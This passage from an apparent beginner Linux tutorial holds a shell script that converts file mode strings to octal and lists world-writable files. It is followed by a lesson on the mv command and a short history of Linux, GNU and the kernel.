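    case "$1" in ??[xst]) n=$((n + 1)) ;; esac
    echo "$n"
}

# Full mode string such as "-rw-r--r--" -> "644".  Only the first ten
# characters are used, so a trailing "+" or "." (ACL / SELinux marker that
# some ls versions append) is ignored.
mode_to_octal() {
    m=$(printf '%.10s' "$1")
    rest=${m#?}                 # drop the file-type character (- or d)
    owner=${rest%??????}        # first three characters
    rest=${rest#???}
    group=${rest%???}           # next three
    world=${rest#???}           # last three
    echo "$(triplet_to_digit "$owner")$(triplet_to_digit "$group")$(triplet_to_digit "$world")"
}

# Succeeds (exit 0) when the world triplet contains w, i.e. any user on the
# machine can modify the file (the 666 / 777 cases the text warns about).
world_writable() {
    case "$(printf '%.10s' "$1")" in
        ????????w?) return 0 ;;
    esac
    return 1
}

# Lists regular files below a directory whose world-write bit is set.
# -perm -002 means "at least these bits" and is portable across find versions.
find_world_writable() {
    find "$1" -type f -perm -002
}

# Walk-through on a scratch directory: create two files, set the modes
# from the examples above, and read them back the way ls -l shows them.
demo() {
    dir=$(mktemp -d)
    : > "$dir/private.txt"
    : > "$dir/shared.txt"
    chmod 644 "$dir/private.txt"   # rw for the owner, r for group and world
    chmod 666 "$dir/shared.txt"    # rw for everyone (the "devil loves this one")
    for f in "$dir"/*; do
        set -- $(ls -l "$f")       # $1=mode  $3=owner  $4=group
        printf '%s  mode=%s octal=%s owner=%s group=%s' \
            "${f##*/}" "$1" "$(mode_to_octal "$1")" "$3" "$4"
        if world_writable "$1"; then
            printf '  <-- world-writable\n'
        else
            printf '\n'
        fi
    done
    echo "world-writable files under $dir:"
    find_world_writable "$dir"
    rm -rf "$dir"
}

demo
```

Running it prints one line per scratch file with the ls -l mode beside its octal form (644 and 666), marks the 666 file as world-writable, and then lists the same file again via find. The find_world_writable function is the part worth keeping: pointed at a home directory or a web root it shows every file that any local user could modify.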

Linux mv command

‘mv’ is a command that is used to move files around or to rename them. ‘mv’ sort of has a split personality because it serves these two functions at the same time.

‘mv’ command for renaming files

Let’s go back yet again to Tony’s file, ‘stuff’. ‘stuff’ is not a good name for a file, just as ‘book’ isn’t a good name for a book. Just imagine: “The number one bestselling book this week is ‘Book’ by John Author.”

You should probably re-name this file to something meaningful. I would suggest doing something like this:

Code:
mv stuff tonys_jokes

You may have noticed the underscore ‘_’ in the title. It’s there because Linux doesn’t really like spaces in file names. You can do it and Linux will accept it, but it will put a \ between the different words. Spaces are sort of a ‘faux pas’ in Linux but not ‘verboten’. It would be to your advantage to use ‘_’ between words, though.

Moving files with the ‘mv’ command

Now you can use the ‘mv’ command to move Tony’s jokes into the directory you made to keep his files.

Code:
mv tonys_jokes tonyd/

If you do cd tonyd and then ls to* you will see his file there along with ‘toms_jokes’ and ‘tomato_soup_recipe’. (if you have another friend named Tom and you like to cook)

You can also move entire directories with this command. You do not have to use the ‘-r’ option as you did with ‘cp’. You would just substitute a directory name for the file name:

Code:
mv tonyd/ my_friends/

would move the directory ‘tonyd’ to the directory ‘my_friends’.

What Is Linux

Beginners Level Course: What is Linux?

Linux is an operating system that evolved from a kernel created by Linus Torvalds when he was a student at the University of Helsinki. Generally, it is obvious to most people what Linux is. However, both for political and practical reasons, it needs to be explained further. To say that Linux is an operating system means that it’s meant to be used as an alternative to other operating systems, Windows, Mac OS, MS-DOS, Solaris and others. Linux is not a program like a word processor and is not a set of programs like an office suite. Linux is an interface between computer/server hardware, and the programs which run on it.

A brief history of Linux
When Linus Torvalds was studying at the University of Helsinki, he was using a version of the UNIX operating system called ‘Minix’. Linus and other users sent requests for modifications and improvements to Minix’s creator, Andrew Tanenbaum, but he felt that they weren’t necessary. That’s when Linus decided to create his own operating system that would take into account users’ comments and suggestions for improvements.

Free Software pre-Linux
This philosophy of asking for users’ comments and suggestions and using them to improve computer programs was not new. Richard Stallman, who worked at the Massachusetts Institute of Technology, had been advocating just such an approach to computer programming and use since the early 1970s. He was a pioneer in the concept of ‘free software’, always pointing out that ‘free’ means ‘freedom’, not zero cost. Finding it difficult to continue working under conditions that he felt went against his concept of ‘free software’, he left MIT in 1984 and founded GNU. The goal of GNU was to produce software that was free to use, distribute and modify. Linus Torvalds’ goal 6 years later was basically the same: to produce an operating system that took into account user feedback.

The kernel
We should point out here that the focal point of any operating system is its ‘kernel’. Without going into great detail, the kernel is what tells the big chip that controls your computer to do what you want the program that you’re using to do. To use a metaphor, if you go to your favorite Italian restaurant and order ‘Spaghetti alla Bolognese’, this dish is like your operating system. There are a lot of things that go into making that dish like pasta, tomato sauce, meatballs and cheese. Well, the kernel is like the pasta. Without pasta, that dish doesn’t exist. You might as well find some bread and make a sandwich. A plate of just pasta is fairly unappetizing.
Without a kernel, an operating system doesn’t exist. Without programs, a kernel is useless.

1991, a fateful year
In 1991, ideal conditions existed that would create Linux. In essence, Linus Torvalds had a kernel but no programs of his own, Richard Stallman and GNU had programs but no working kernel. Read the two men’s own words about this:

Linux is introduced
Late in 1991, Linus Torvalds had his kernel and a few GNU programs wrapped around it so it would work well enough to show other people what he had done. And that’s what he did. The first people to see Linux knew that Linus was on to something. At this point, though, he needed more people to help him. Here’s what Linus had to say back in 1991.

People all over the world decided to take him up on it. At first, only people with extensive computer programming knowledge would be able to do anything with that early public version of Linux. These people started to offer their help. The version numbers of Linux were getting higher and higher. People began writing programs specifically to be run under Linux. Developers began writing drivers so that the different video cards, sound cards and other gadgets inside and outside your computer could be used with Linux. Nevertheless, throughout most of the first part of the 1990s Linux did not get out of the ‘GURU’ stage. GURU is a term that has evolved to mean anyone who has special expertise in a particular subject. That is, you had to have special expertise in how computers worked to be able to install Linux in those days.

Linux, at first, was not for everybody

Other popular software companies sold you a CD or a set of floppies and a brief instruction booklet and in probably less than a half an hour, you could install a fully working operating system on your PC. The only ability you needed was knowing how to read. Those companies had that intention when they actually sat down and developed their operating systems. Linus Torvalds didn’t have that in mind when he developed Linux. It was just a hobby for him. Later on, companies like Red Hat made it their goal to bring Linux to the point where it could be installed just like any other operating system; by anyone who can follow a set of simple instructions, and they have succeeded. For some reason, though, Linux hasn’t completely lost its ‘Gurus only’ image. This is largely because of the popular tech press’ inability to explain in a meaningful way what Linux is. The truth is that few tech reporters have real life experience with Linux and it is reflected in their writing.

Where Linux is Today
Today, Linux is enjoying a favorable press for the most part. This comes from the fact that Linux has proven to be a tremendously stable and versatile operating system, particularly as a network server. When Linux is deployed as a web server or in corporate networks, its down-time is almost negligible. There have been cases when Linux servers have been running for more than a year without re-booting and then only taken down for a brief period for routine maintenance. Its cost effectiveness has sold it more than anything else. Linux can be installed on a home PC as well as a network server for a fraction of the cost of other companies’ software packages. More reliability and less cost – it’s ideal.

If you’re reading this, you’re obviously here to learn how to use Linux. Any learning experience means opening up to new ideas and new ways of doing things. As mentioned before, Linux is in the UNIX family of operating systems. UNIX is primarily designed to be used by professionals. You will have to learn some UNIX concepts in this lesson, but that doesn’t mean that Linux is a professionals-only operating system. In fact, most major versions of Linux are designed to be as user-friendly and as easy to install as any other operating system on the market today.

Now that you know what Linux is and how good it is, there’s one more thing we have to do – install Linux!